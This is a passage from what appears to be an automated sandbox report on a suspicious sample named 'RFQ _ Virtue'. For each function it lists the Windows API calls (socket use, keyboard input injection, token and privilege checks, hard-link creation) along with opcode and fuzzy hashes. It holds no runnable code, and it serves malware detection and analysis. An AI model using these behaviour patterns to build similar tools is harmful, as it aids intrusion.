Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
Opcode Fuzzy Hash: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86

Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004780C3
CoUninitialize.OLE32 ref: 004780CE

Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4

VariantInit.OLEAUT32(?), ref: 004780D9
VariantClear.OLEAUT32(?), ref: 004783AA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
Opcode Fuzzy Hash: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A

Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045688E
SysAllocString.OLEAUT32(00000000), ref: 00456937
VariantCopy.OLEAUT32 ref: 00456966
VariantClear.OLEAUT32(?), ref: 0045698D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
Opcode Fuzzy Hash: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D

Function 004897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00C12DB8,?), ref: 00489863
ScreenToClient.USER32(00000002,00000002), ref: 00489896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94

Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
WSAGetLastError.WSOCK32(00000000), ref: 004769E1

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
WSAGetLastError.WSOCK32(00000000), ref: 00476A51

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59

Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
_strlen.LIBCMT ref: 004764D9

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
Opcode Fuzzy Hash: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58

Function 0046B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99

Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F

Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0048AB60
GetWindowRect.USER32(?,?), ref: 0048ABD6
PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
MessageBeep.USER32(00000000), ref: 0048AC57

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A

Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F

Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B

Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
__isleadbyte_l.LIBCMT ref: 00436229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754

Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00484F02

Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669

GetCaretPos.USER32(?), ref: 00484F13
ClientToScreen.USER32(00000000,?), ref: 00484F4E
GetForegroundWindow.USER32 ref: 00484F54

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5

Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetCursorPos.USER32(?), ref: 0048C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
GetCursorPos.USER32(?), ref: 0048C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8

Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
_memcmp.LIBCMT ref: 004586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
HeapFree.KERNEL32(00000000), ref: 00458703

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58

Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 004209AE

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

_fprintf.LIBCMT ref: 004209E5
OutputDebugStringW.KERNEL32(?), ref: 00455DBB

Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3

__setmode.LIBCMT ref: 00420A1A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
